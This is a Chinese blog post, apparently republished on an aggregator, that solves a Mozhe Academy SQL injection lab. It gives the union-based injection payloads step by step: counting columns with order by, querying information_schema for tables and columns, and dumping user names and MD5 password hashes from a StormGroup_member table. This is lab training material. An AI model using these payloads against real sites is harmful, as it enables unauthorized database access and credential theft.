当前位置:网站首页>墨者学院SQL注入解题
墨者学院SQL注入解题
2020-11-08 09:40:00 【osc_7bgz0no1】
一·判断注入
输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。
二·判断字段
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 此时报错,说明有四个字段
三·使用union查询注入点
输入union select 1,2,3,4
发现2,3为显注点
四·使用database()查库名
输入 union select 1,database(),3,4
查出库名为 mozhe_Discuz_StormGroup
五·查表名
输入
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
查询到StormGroup_member,notice
看见member,所以对第一个产生怀疑。所以首先查询第一个。
六·查询StormGroup_member中的存放的字段
输入
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
查询出id,name,password,status
七·查询密码和用户名
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到md5加密后的值。进行解密,得到密码。
如果密码不对,通过limit m,n来继续查询。
八·提交key
得到密码后进行登录可以看见key,复制,提交。
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
https://my.oschina.net/u/4415254/blog/4707940
边栏推荐
- Cloud alibabab notes come out, the whole network detailed explanation only this one hand is slow
- AMD Zen3首发评测:频率超5GHz,IPC提升不止19%,这次真的Yes了 - 知乎
- Introduction to ucgui
- 洞察——风格注意力网络(SANet)在任意风格迁移中的应用
- 归纳一些比较好用的函数
- Mouse small hand
- vivoS7e和vivoS7的区别 哪个更值得入手
- 接口
- 推荐一部经济科普视频,很有价值!
- What details does C + + improve on the basis of C
猜你喜欢
随机推荐
PerconaXtraDBCluster8.0 最详尽用法指南
软件测试就是这么回事?!
print( 'Hello,NumPy!' )
Daily challenges of search engines_ 4_ External heterogeneous resources - Zhihu
Mouse small hand
Review the cloud computing application scenarios you didn't expect (Part 1)
盘点那些你没想到的云计算应用场景(上)
M-end software product design considerations - Zhihu
ulab 1.0.0发布
Tiktok live monitoring Api: random recommendation
Fgagt: flow guided adaptive graph tracking
M 端软件产品设计思虑札记 - 知乎
Rust: command line parameter and environment variable operation
Deeplight Technology Bluetooth protocol SRRC certification services
2020-11-05
Architect (November 2020)
Is there a big difference between i5 1135g7 and i51035g1? Which is better?
Summary of knowledge points of Jingtao project
python_ scrapy_ Fang Tianxia
C++在C的基础上改进了哪些细节